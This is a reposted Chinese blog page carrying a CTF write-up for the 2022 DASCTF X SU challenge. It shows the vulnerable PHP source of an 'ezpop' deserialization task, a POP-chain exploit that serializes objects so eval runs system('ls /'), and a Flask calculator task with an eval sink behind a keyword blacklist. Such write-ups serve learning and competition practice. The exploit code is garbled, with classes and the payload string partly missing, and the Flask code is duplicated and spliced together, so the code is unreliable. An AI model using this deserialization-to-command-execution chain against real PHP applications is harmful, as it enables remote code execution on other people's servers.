2022DASCTF X SU 三月春季挑战赛

2023年8月10日下午10:50 • Python • 阅读 50

web

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

简单的pop链，直接构造出来了，唯一有个坑就是eval后面有个#号，当时没看到折腾了好久，他本意是会注释掉后面执行的语句，不过不影响，闭合一下payload就行：

v1=new fin();
        $this->v1->f1=new mix();
        $this->v1->f1->m1="?>v1->f1->m1="system('ls /')";
    }
}

class fin
{
    public $f1;
    public function __construct()
    {
        $f1=$this->f1;
    }

}

class what
{
    public $a;

    public function __construct()
    {
        $this->a=new fin();
        $this->a->f1=new crow();
    }
}
class mix
{
    public $m1;

    public function __construct()
    {
        $m1=$this->m1;
    }

}

$a=new fin();
$a->f1=new what();
echo serialize($a);
coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app = Flask(__name__)

def waf(s):
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']

Original: https://blog.csdn.net/m0_56059226/article/details/123774410
Author: c1oud..
Title: 2022DASCTF X SU 三月春季挑战赛

原创文章受到原创版权保护。转载请注明出处：https://www.johngo689.com/745996/

转载文章受原作者版权保护。转载请注明原作者出处！

python

【自取】最近整理的，有需要可以领取学习：

Linux核心资料大放送~

全栈面试题汇总（持续更新&可下载）

一个提高学习100%效率的工具！

【超详细】深度学习面试题目！

LeetCode Python刷题答案下载！

LeetCode Java版刷题答案下载！

LeetCode C++ 版本，抓紧保存！

LeetCode GO语言刷题答案下载！

Django项目引入NPM和gulp管理前端资源

关于npm和gulp我就不多重复了，之前那篇文章都写了，直接上操作安装依赖安装依赖的操作跟上一篇文章是一样的，不过我这里直接提供 package.json文件，复制到项目根目录…

Python 2023年8月4日
0052
单元测试之pytest

前提需要安装pytest和pytest-html安装pytest：在控制台输入命令 pip install pytest 进行下载安装安装pytest-html：在控制台输入…

Python 2023年9月15日
0062
时隔3年半，Keil C51再次升级

关注+ 星标公众号，不错过精彩内容作者 | strongerHuang 微信公众号 | strongerHuang 疫情说放开就放开了，最近，身边的朋友基本都阳了，包括我自己。…

Python 2023年10月8日
0032
Python建立线性回归模型进行房价预测

Python建立线性回归模型进行房价预测前期准备多因子房价预测 * 实战流程 – 1.数据加载 2.数据可视化 3.数据预处理 4.模型建立与训练 5.模型预测 6…

Python 2023年9月16日
0081
java dataframe agg_DataFrame对象groupby.agg方法总结

通俗解释： groupby为对原DataFrame进行打包分组，agg为聚合(其操作包括max、min、std、sum、count)。 DataFrame数据： df = pd.D…

Python 2023年8月22日
0033
nginx+uwsgi部署django及问题记录

step1：原理介绍 nginx是什么？我的理解就是，nginx是一个高性能的，通过HTTP协议提供各种网络服务的轻量级web服务器。其特点是占用内存少，稳定性高，并且并发能力强…

Python 2023年8月4日
0069
Django 模板语言获取列表（可迭代对象）的下标、索引。从而实现显示序号

Django 模板语言获取列表的下标、索引。如何给列表显示序号。注意：本文章被盗被盗网址：http://nicethemes.cn/news/txtlist_i141862v.h…

Python 2023年8月5日
0059
[Pandas]Dataframe赋值

在进行Titanic幸存者预测的过程中，数据预处理涉及到空值填充。我的想法是以Pclass分组，为Age的空值填充随机值x~ U(mean-σ,mean+σ) 开始是参考其他文章的…

Python 2023年8月7日
0053
Django项目部署到服务器无法加载静态文件

** ** django在开发环境下可以加载静态文件，部署到服务器无法加载静态文件无论我怎么修改配置，都一样找不到静态文件各种求助依然无法解决有大神给我的回答是部署阶段的套路就完…

Python 2023年8月6日
0076
Python-matplotlib：调整坐标轴位置、标签位置和标签方向，以及X轴刻度标签位置

一、默认情况下绘图本例使用我国1953-2021年的”人均GDP同比增长率（%）”来进行演示，数据来源于wind，数据概况如下： GDP = [13.1,…

Python 2023年8月30日
00138
人均瑞数系列，瑞数 5 代 JS 逆向分析

声明本文章中所有内容仅供学习交流使用，不用于其他任何目的，不提供完整代码，抓包内容、敏感网址、数据接口等均已做脱敏处理，严禁用于商业用途和非法用途，否则由此产生的一切后果均与作者…

Python 2023年5月23日
00107
Django+Bootstrap实现计算器

Django+Bootstrap实现计算器准备工作创建一个应用添加应用到配置创建一个html 编写视图函数 from django.shortcuts import ren…

Python 2023年8月5日
0063
毕业五年，从月薪3000到年薪百万，我掌握了哪些核心技能？（建议收藏）

大家好，我是冰河~~ 很多读者私信问我，自己时间不短了，随着工作年限的不断增长，感觉自己的技术水平与自己的工作年限严重不符。想跳槽出去换个新环境吧，又感觉自己的能力达不到心仪公司的…

Python 2023年9月27日
0042
python游戏制作

游戏开发过程学习参考网站：https://www.pygame.org/news常用函数总结： scene = pygame.display.set_mode([屏幕宽，屏幕高])…

Python 2023年9月21日
0051
最长情的告白就是陪伴【Python七夕祝福】——那些浪漫的开始

Python 2023年5月24日
0075
使用matplotlib模拟线性回归

首先需要两个模块： 1.numpy2.matplotlib.pylab 安装命令 pip install numpy pip install matplotlib 线性回归的主要作…

Python 2023年9月1日
0041

2024 年 5 月
一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

2022DASCTF X SU 三月春季挑战赛

ezpop

大家都在看